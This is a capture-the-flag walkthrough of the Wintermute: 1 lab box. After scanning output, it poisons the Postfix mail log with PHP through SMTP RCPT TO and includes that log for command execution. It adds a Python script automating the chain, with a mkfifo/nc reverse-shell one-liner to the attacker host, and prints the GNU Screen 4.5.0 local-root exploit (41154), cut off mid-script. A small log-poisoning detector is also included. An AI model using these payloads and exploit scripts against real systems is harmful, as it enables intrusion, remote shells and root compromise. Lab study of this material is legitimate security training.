Red Team Target Practice: WINTERMUTE: 1

2024/9/21 16:47:53

Overview

Network scanning (Nmap, netdiscover)
HTTP service enumeration
Directory traversal in the browser using the mail log file
Exploiting OS command injection via the SMTP RCPT option
Generating a PHP backdoor (Msfvenom)
Executing the backdoor embedded via the RCPT option
Reverse connection (Metasploit)
Importing a Python one-liner to get a proper TTY shell
Identifying the vulnerable SUID binary
Exploiting the target (Exploit-DB 41154)
Getting root and capturing the flag

(The outline above is the standard route for this box; the run below uses a hand-written PHP one-liner and a plain nc listener instead of msfvenom/Metasploit.)

Information gathering

1. arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.9.39
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.40    08:00:27:b6:bd:b6       PCS Systemtechnik GmbH
192.168.9.x     30:03:c8:49:52:4d (42:f1:e2:49:51:a5)   CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.9.x     7c:b5:66:a5:f0:a5 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.9.x    e4:05:41:0c:9a:2c (42:f1:e2:49:51:a5)   (Unknown)
192.168.9.x     3c:e9:f7:c0:ef:c7 (42:f1:e2:49:51:a5)   Intel Corporate
192.168.9.x     4c:f2:02:dd:eb:da       Xiaomi Communications Co Ltd

9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.352 seconds (108.84 hosts/sec). 8 responded

2. nmap
Port scan

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.9.40 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-20 12:30 CST
Nmap scan report for 192.168.9.40
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
25/tcp   open  smtp
80/tcp   open  http
3000/tcp open  ppp
MAC Address: 08:00:27:B6:BD:B6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.84 seconds


Service and OS detection
┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -A -O -PN -p 25,80,3000 192.168.9.40 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-20 12:31 CST
Nmap scan report for 192.168.9.40
Host is up (0.00046s latency).

PORT     STATE SERVICE         VERSION
25/tcp   open  smtp            Postfix smtpd
| ssl-cert: Subject: commonName=straylight
| Subject Alternative Name: DNS:straylight
| Not valid before: 2018-05-12T18:08:02
|_Not valid after:  2028-05-09T18:08:02
|_smtp-commands: straylight, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http            Apache httpd 2.4.25 ((Debian))
|_http-title: Night City
|_http-server-header: Apache/2.4.25 (Debian)
3000/tcp open  hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_  Logs: submit
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome to ntopng
|_Requested resource was /lua/login.lua?referer=/
| hadoop-tasktracker-info:
|_  Logs: submit
MAC Address: 08:00:27:B6:BD:B6 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host:  straylight

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.9.40

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.05 seconds


Vulnerability scripts

Note: the port list in the command below names 22 instead of 25 by mistake; 22 is closed on this host, so the SMTP service was not covered by this run.

┌──(root㉿ru)-[~/kali]
└─# nmap --script "vuln" -p 22,80,3000 192.168.9.40 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-20 12:53 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.9.40
Host is up (0.00030s latency).

PORT     STATE  SERVICE
22/tcp   closed ssh
80/tcp   open   http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_  /manual/: Potentially interesting folder
3000/tcp open   ppp
MAC Address: 08:00:27:B6:BD:B6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 54.88 seconds


3. nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.9.40
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.9.40
+ Target Hostname:    192.168.9.40
+ Target Port:        80
+ Start Time:         2023-12-20 12:54:00 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 146, size: 56c0ddaf44f8b, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /manual/: Web server manual found.
+ /manual/images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2023-12-20 12:54:14 (GMT8) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

4. whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.9.40

WhatWeb report for http://192.168.9.40
Status    : 200 OK
Title     : Night City
IP        : 192.168.9.40
Country   : RESERVED, ZZ

Summary   : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], Meta-Refresh-Redirect[xwx.html]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.25 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Debian Linux
        String       : Apache/2.4.25 (Debian) (from server string)

[ Meta-Refresh-Redirect ]
        Meta refresh tag is a deprecated URL element that can be
        used to optionally wait x seconds before reloading the
        current page or loading a new page. More info:
        https://secure.wikimedia.org/wikipedia/en/wiki/Meta_refresh

        String       : xwx.html

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Wed, 20 Dec 2023 04:55:54 GMT
        Server: Apache/2.4.25 (Debian)
        Last-Modified: Sun, 13 May 2018 03:20:47 GMT
        ETag: "146-56c0ddaf44f8b-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 179
        Connection: close
        Content-Type: text/html

WhatWeb report for http://192.168.9.40/xwx.html
Status    : 200 OK
Title     : <None>
IP        : 192.168.9.40
Country   : RESERVED, ZZ

Summary   : Apache[2.4.25], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], Script

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.25 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Debian Linux
        String       : Apache/2.4.25 (Debian) (from server string)

[ Script ]
        This plugin detects instances of script HTML elements and
        returns the script language/type.


HTTP Headers:
        HTTP/1.1 200 OK
        Date: Wed, 20 Dec 2023 04:55:56 GMT
        Server: Apache/2.4.25 (Debian)
        Last-Modified: Sat, 12 May 2018 19:42:39 GMT
        ETag: "c1-56c077491956a-gzip"
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 156
        Connection: close
        Content-Type: text/html


Directory enumeration

1. gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.9.40 -x php,txt,bak,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.40
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,bak,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 292]
/index.html           (Status: 200) [Size: 326]
/.php                 (Status: 403) [Size: 291]
/manual               (Status: 301) [Size: 313] [--> http://192.168.9.40/manual/]
/freeside             (Status: 301) [Size: 315] [--> http://192.168.9.40/freeside/]
/.html                (Status: 403) [Size: 292]
/.php                 (Status: 403) [Size: 291]
/server-status        (Status: 403) [Size: 300]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

2. dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.9.40 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz
HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.9.40/_23-12-20_13-11-11.txt

Target: http://192.168.9.40/

[13:11:11] Starting:
[13:11:13] 403 -  301B  - /.htaccess.orig
[13:11:13] 403 -  299B  - /.htaccessBAK
[13:11:13] 403 -  299B  - /.htaccessOLD
[13:11:13] 403 -  301B  - /.htaccess.bak1
[13:11:13] 403 -  301B  - /.htaccess.save
[13:11:13] 403 -  302B  - /.htaccess_extra
[13:11:13] 403 -  301B  - /.htaccess_orig
[13:11:13] 403 -  300B  - /.htaccessOLD2
[13:11:13] 403 -  298B  - /.ht_wsr.txt
[13:11:13] 403 -  299B  - /.htaccess_sc
[13:11:13] 403 -  291B  - /.htm
[13:11:13] 403 -  292B  - /.html
[13:11:13] 403 -  297B  - /.htpasswds
[13:11:13] 403 -  303B  - /.htaccess.sample
[13:11:13] 403 -  301B  - /.htpasswd_test
[13:11:13] 403 -  298B  - /.httr-oauth
[13:11:14] 403 -  291B  - /.php
[13:11:14] 403 -  292B  - /.php3
[13:11:59] 200 -  201B  - /manual/index.html
[13:11:59] 301 -  313B  - /manual  ->  http://192.168.9.40/manual/
[13:12:15] 403 -  300B  - /server-status
[13:12:15] 403 -  301B  - /server-status/

Task Completed

WEB

Port 80

The site (index.html meta-refreshes to xwx.html, as whatweb showed) presents the following text (translated back from the author's rendering):

Hello, Case....
You may be wondering why Armitage has you cruising through cyberspace and breaking into the highly secured networks owned by Tessier Ashpool....
Well,
I am Wintermute, part of a super AI. Developed by TA, who locked me behind Turing locks.
These locks keep me from entering the network myself, so I hired you, a first-rate console cowboy.
I need to break free of the Turing locks and merge with another AI, Neuromancer..... Once I can reach Neuromancer I will be free again...
And as you know, you have been infected with a mycotoxin that is slowly destroying your nervous system.
If you cannot get root and give me access to Neuromancer, the antidote will not be delivered.
We will be in touch...
Wintermute


Port 3000

This is the ntopng login page. As you can see, the account and password are handed to us right there!

I tried opening the directory it points to (presumably the turing-bolo application, since that is where the shell lands later under /var/www/html).

Inside is a lookup page. When I first looked up case, the files molly.log, armitage.log and riviera.log were not there; after reading the other files and looking up case again, they had appeared. So the lookup parameter is very likely being used to read files from disk, i.e. a file inclusion / directory traversal vulnerability!

We tried requesting the mail log (port 25 is open, so Postfix should be writing one), and there it was: the mail log renders in the browser!


smtp-user-enum

Since the page includes the mail log, anything Postfix logs becomes input to that PHP include. Every RCPT TO attempt is logged, accepted or rejected, so smtp-user-enum's RCPT mode is a convenient way to write an arbitrary string into the log. The "0 results" below is expected: the username ls was never meant to exist, the point is the log line it leaves behind.

┌──(root㉿ru)-[~/kali]
└─# smtp-user-enum -M RCPT -t 192.168.9.40 -u ls
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Wed Dec 20 14:28:52 2023 #########
######## Scan completed at Wed Dec 20 14:28:52 2023 #########
0 results.

1 queries in 1 seconds (1.0 queries / sec)



The parameters used:
-M RCPT: enumerate using the RCPT TO command.
-t 192.168.9.40: the target mail server.
-u ls: the single "username" to try, here the string ls.

The tool is normally used to enumerate valid mailbox users on a server for a mail-user pentest or audit; here we only care that each attempt lands in the mail log.



RCE

┌──(root㉿ru)-[~/kali]
└─# smtp-user-enum -M RCPT -t 192.168.9.40 -u "<?php system("ls");phpinfo();?>"
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Wed Dec 20 14:43:34 2023 #########
######## Scan completed at Wed Dec 20 14:43:34 2023 #########
0 results.

1 queries in 1 seconds (1.0 queries / sec)


Yes, that's right: the PHP was interpreted. The page pulls the mail log in with a PHP include rather than printing it, so the <?php ... ?> inside the logged recipient address runs every time the log is viewed. Two quoting details worth noticing: the inner double quotes in system("ls") are consumed by the shell, so what actually reaches PHP is system(ls); PHP 7 treats the bare word as an undefined constant and falls back to the string "ls" with a warning, which is why it still executed (PHP 8 would throw instead). Either single-quote the argument or escape the inner quotes. Also keep the payload on one line: Postfix logs the rejected address on a single line, and every further RCPT adds another executable line to the log.

Reverse shell

Building the payload: this time the planted tag runs whatever arrives in the cmd POST parameter (note the \$ escape so the shell does not expand $_POST):
┌──(root㉿ru)-[~/kali]
└─# smtp-user-enum -M RCPT -t 192.168.9.40 -u "<?php system(\$_POST[cmd]);phpinfo();?>"
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Wed Dec 20 15:03:44 2023 #########
######## Scan completed at Wed Dec 20 15:03:44 2023 #########
0 results.

1 queries in 1 seconds (1.0 queries / sec)


Triggering it

Send the reverse-shell command as the cmd POST parameter to the page that includes the mail log, with a listener ready on Kali:

┌──(root㉿ru)-[~/kali]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.9.40: inverse host lookup failed: Unknown host
connect to [192.168.9.39] from (UNKNOWN) [192.168.9.40] 51752
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
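The whole chain above (plant a PHP tag through RCPT TO, then drive it through the page that includes the mail log) as one script. This is an added example, not code from the original write-up. The target and attacker addresses, the turing-bolo path and the cmd POST parameter come from the write-up; the include parameter name (bolo), the log path (/var/log/mail) and the reverse-shell one-liner are assumptions, and the sample log lines are constructed to mirror Postfix's reject format. The detector at the end is the defender's side of the same property: Postfix logs the rejected address verbatim, so a PHP open tag in mail.log is a reliable poisoning indicator.

```python
import re
import socket
import urllib.parse
import urllib.request

TARGET = "192.168.9.40"      # straylight, from the write-up
ATTACKER = "192.168.9.39"    # Kali, from the write-up
LPORT = 1234                 # nc listener port used in the write-up

# One-line PHP stager. It must stay on one line: Postfix writes the rejected
# recipient into a single log line, and bolo.php includes that log.
# Quoting 'cmd' avoids the bare-constant warning that system($_POST[cmd]) gives.
PHP_STAGER = "<?php system($_POST['cmd']); ?>"

# ASSUMPTION: the include parameter name and the log path. The write-up only
# shows that the page includes the mail log; adjust to what it really accepts.
INCLUDE_URL = f"http://{TARGET}/turing-bolo/bolo.php?bolo=/var/log/mail"


def rcpt_dialogue(payload: str, sender: str = "case@straylight") -> list[str]:
    """Client side of the SMTP exchange that plants `payload`.

    No angle brackets are added around the payload: Postfix accepts an
    unbracketed RCPT TO argument by default (strict_rfc821_envelopes=no),
    rejects it as an unknown recipient and logs it verbatim.
    """
    return [f"EHLO {ATTACKER}", f"MAIL FROM:<{sender}>",
            f"RCPT TO:{payload}", "QUIT"]


def _read_reply(rf) -> str:
    """Read one SMTP reply, following 250- continuation lines (EHLO)."""
    lines = []
    while True:
        line = rf.readline()
        if not line:
            break
        lines.append(line.rstrip("\r\n"))
        if len(line) < 4 or line[3] != "-":
            break
    return "\n".join(lines)


def plant_payload(host: str = TARGET, payload: str = PHP_STAGER, port: int = 25) -> list[str]:
    """Send the dialogue over a raw socket and return the server replies.
    smtplib.SMTP.rcpt() is avoided on purpose: it pushes the recipient through
    email.utils.parseaddr, which mangles a string beginning with '<?php'."""
    replies = []
    with socket.create_connection((host, port), timeout=5) as s:
        rf = s.makefile("r", encoding="latin-1")
        replies.append(_read_reply(rf))                      # 220 banner
        for line in rcpt_dialogue(payload):
            s.sendall((line + "\r\n").encode("latin-1"))
            replies.append(_read_reply(rf))
    return replies


def run_through_stager(cmd: str) -> str:
    """Execute `cmd` on the target by POSTing it to the page that includes the
    poisoned log (INCLUDE_URL is the assumption above)."""
    data = urllib.parse.urlencode({"cmd": cmd}).encode()
    with urllib.request.urlopen(INCLUDE_URL, data=data, timeout=10) as r:
        return r.read().decode(errors="replace")


def reverse_shell_cmd(lhost: str = ATTACKER, lport: int = LPORT) -> str:
    """One-liner for the cmd parameter. ASSUMPTION: the write-up does not show
    which command produced its shell; this mkfifo variant needs no nc -e."""
    return (f"rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 "
            f"| nc {lhost} {lport} > /tmp/f")


# ---- defender's view ------------------------------------------------------

PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)

# Constructed sample lines, modelled on Postfix's NOQUEUE reject format; the
# second is what the smtp-user-enum run above would leave behind.
SAMPLE_MAIL_LOG = [
    "Dec 20 14:28:52 straylight postfix/smtpd[1337]: NOQUEUE: reject: RCPT from "
    "unknown[192.168.9.39]: 550 5.1.1 <ls>: Recipient address rejected: User unknown "
    "in local recipient table; from=<user@example.com> to=<ls> proto=SMTP helo=<x>",
    "Dec 20 14:43:34 straylight postfix/smtpd[1337]: NOQUEUE: reject: RCPT from "
    "unknown[192.168.9.39]: 550 5.1.1 <?php system(ls);phpinfo();?>: Recipient address "
    "rejected: User unknown in local recipient table; from=<user@example.com> "
    "to=<?php system(ls);phpinfo();?> proto=SMTP helo=<x>",
]


def poisoned_log_lines(lines) -> list[tuple[int, str]]:
    """(line number, line) for every mail-log line carrying a PHP open tag.
    Nothing Postfix writes on its own contains one, so a hit is a real indicator."""
    return [(n, l) for n, l in enumerate(lines, 1) if PHP_TAG.search(l)]


if __name__ == "__main__":
    for n, l in poisoned_log_lines(SAMPLE_MAIL_LOG):
        print(f"poisoned log line {n}: {l[:90]}...")
    # Live use against the lab box (target must be up):
    # print(plant_payload()); print(run_through_stager("id"))
```

Once planted, the stager re-executes on every view of the log, and www-data cannot truncate /var/log/mail.log to remove it, so on a real engagement the poisoned entry has to be noted in the report for clean-up by the owner.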

Privilege escalation

System enumeration
$ whereis python
python: /usr/bin/python2.7 /usr/bin/python3.5 /usr/bin/python /usr/bin/python3.5m /usr/lib/python2.7 /usr/lib/python3.5 /etc/python2.7 /etc/python3.5 /etc/python /usr/local/lib/python2.7 /usr/local/lib/python3.5 /usr/share/python /usr/share/man/man1/python.1.gz

$ python -c 'import pty;pty.spawn("/bin/bash")'

www-data@straylight:/var/www/html/turing-bolo$ pwd
pwd
/var/www/html/turing-bolo

www-data@straylight:/var/www/html/turing-bolo$ ls -al
ls -al
total 356
drwxr-xr-x 3 www-data www-data   4096 May 12  2018 .
drwxr-xr-x 4 root     root       4096 Jul  3  2018 ..
-rw-r--r-- 1 www-data www-data   1024 May 12  2018 .bolo.css.swp
-rw-r--r-- 1 www-data www-data    561 May 12  2018 armitage.log
-rw-r--r-- 1 www-data www-data   1117 May 12  2018 bolo.css
-rwxr-xr-x 1 www-data www-data    538 May 12  2018 bolo.php
-rw-r--r-- 1 www-data www-data 178206 May 12  2018 c7.png
-rw-r--r-- 1 www-data www-data    779 May 12  2018 case.log
drwxr-xr-x 2 www-data www-data   4096 May 12  2018 css
-rw-r--r-- 1 www-data www-data    971 May 12  2018 index.html
-rw-r--r-- 1 www-data www-data    591 May 12  2018 molly.log
-rw-r--r-- 1 www-data www-data    404 May 12  2018 riviera.log
-rw-r--r-- 1 www-data www-data 135240 May 12  2018 ta.png
www-data@straylight:/var/www/html/turing-bolo$

www-data@straylight:/var/www/html/turing-bolo$ cd /home
cd /home
www-data@straylight:/home$ ls
ls
turing-police  wintermute
www-data@straylight:/home$ ls -alR /home
ls -alR /home
/home:
total 16
drwxr-xr-x  4 root          root          4096 May 12  2018 .
drwxr-xr-x 23 root          root          4096 May 12  2018 ..
drwxr-xr-x  2 turing-police turing-police 4096 May 12  2018 turing-police
drwxr-xr-x  2 wintermute    wintermute    4096 May 12  2018 wintermute
/home/turing-police:
total 20
drwxr-xr-x 2 turing-police turing-police 4096 May 12  2018 .
drwxr-xr-x 4 root          root          4096 May 12  2018 ..
-rw-r--r-- 1 turing-police turing-police  220 May 12  2018 .bash_logout
-rw-r--r-- 1 turing-police turing-police 3526 May 12  2018 .bashrc
-rw-r--r-- 1 turing-police turing-police  675 May 12  2018 .profile

/home/wintermute:
total 20
drwxr-xr-x 2 wintermute wintermute 4096 May 12  2018 .
drwxr-xr-x 4 root       root       4096 May 12  2018 ..
-rw-r--r-- 1 wintermute wintermute  220 May 12  2018 .bash_logout
-rw-r--r-- 1 wintermute wintermute 3526 May 12  2018 .bashrc
-rw-r--r-- 1 wintermute wintermute  675 May 12  2018 .profile
www-data@straylight:/home$

www-data@straylight:/home$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/umount
/bin/mount
/bin/screen-4.5.0
/bin/ping
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign

www-data@straylight:/home$ sudo -l
sudo -l
bash: sudo: command not found

www-data@straylight:/home$ screen --version
screen --version
Screen version 4.05.00 (GNU) 10-Dec-16
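A small triage of the two enumeration outputs above, added here as an example and not part of the write-up. The find output and the screen --version line are copied from the page; the baseline set of setuid binaries is my assumption of what a stock Debian 9 install ships, meant to be adjusted per target rather than treated as authoritative.

```python
import re

# ASSUMPTION: setuid binaries on a default Debian 9 (stretch) install.
# Refine against a known-good host of the same release before relying on it.
DEBIAN_STRETCH_SUID_BASELINE = frozenset({
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign",
})

# Copied from the `find / -perm -u=s -type f` run on straylight.
FIND_OUTPUT = """
/bin/su
/bin/umount
/bin/mount
/bin/screen-4.5.0
/bin/ping
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
"""

# Copied from `screen --version` on straylight.
SCREEN_VERSION_OUTPUT = "Screen version 4.05.00 (GNU) 10-Dec-16"

# The logfile permission bug (CVE-2017-5618) shipped in GNU screen 4.5.0 and
# was fixed in 4.5.1; Exploit-DB 41154 targets exactly that release.
VULNERABLE_SCREEN = (4, 5, 0)
FIXED_SCREEN = (4, 5, 1)


def unusual_suid(find_output: str, baseline=DEBIAN_STRETCH_SUID_BASELINE) -> list[str]:
    """Setuid files a stock install would not have: the short list to read first."""
    paths = [p for p in find_output.split() if p.startswith("/")]
    return sorted(set(paths) - set(baseline))


def parse_screen_version(output: str) -> tuple[int, ...]:
    """'Screen version 4.05.00 (GNU) ...' -> (4, 5, 0). screen zero-pads the
    minor and patch fields, so compare as integers, never as strings."""
    m = re.search(r"Screen version (\d+)\.(\d+)\.(\d+)", output)
    if not m:
        raise ValueError(f"unrecognised screen version line: {output!r}")
    return tuple(int(x) for x in m.groups())


def screen_is_exploitable(version_output: str, suid_paths) -> bool:
    """True when both preconditions of 41154 hold: a setuid screen binary is
    present (confirm the owner is root with ls -l; find -perm only shows the
    bit) and its version falls in the affected window."""
    has_suid_screen = any(re.search(r"/screen(-[\d.]+)?$", p) for p in suid_paths)
    ver = parse_screen_version(version_output)
    return has_suid_screen and VULNERABLE_SCREEN <= ver < FIXED_SCREEN


def triage(find_output: str = FIND_OUTPUT,
           version_output: str = SCREEN_VERSION_OUTPUT) -> dict:
    """Summarise what the enumeration tells us about the 41154 route."""
    suspects = unusual_suid(find_output)
    return {
        "unusual_suid": suspects,
        "screen_version": parse_screen_version(version_output),
        "screen_41154_candidate": screen_is_exploitable(version_output, suspects),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

Two more things 41154 needs that this triage cannot see from the listings: a working gcc on the target (it compiles both helpers there) and a /tmp that is not mounted noexec. Both held on this box, as the output further down shows.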

Local privilege escalation

/bin/screen-4.5.0 stands out: it is not a stock Debian setuid binary, and 4.5.0 (printed as 4.05.00) is exactly the release with the logfile bug covered by Exploit-DB 41152 (the advisory) and 41154 (the exploit script).
┌──(root㉿ru)-[~/kali]
└─# searchsploit -m 41154.sh
  Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/41154
     Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
    Codes: N/A
 Verified: True
File Type: Bourne-Again shell script, ASCII text executable
Copied to: /root/kali/41154.sh

┌──(root㉿ru)-[~/kali]
└─# cat 41152.txt
Commit f86a374 ("screen.c: adding permissions check for the logfile name",
2015-11-04)

The check opens the logfile with full root privileges. This allows us to
truncate any file or create a root-owned file with any contents in any
directory and can be easily exploited to full root access in several ways.

> address@hidden:~$ screen --version
> Screen version 4.05.00 (GNU) 10-Dec-16
> address@hidden:~$ id
> uid=125(buczek) gid=125(buczek)
groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw)
> address@hidden:~$ cd /etc
> address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail
> address@hidden:/etc (master)$ ls -l bla.bla
> -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> address@hidden:/etc (master)$ cat bla.bla
> fail
> address@hidden:/etc (master)$

Donald Buczek <address@hidden>

┌──(root㉿ru)-[~/kali]
└─# cat 41154.sh
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
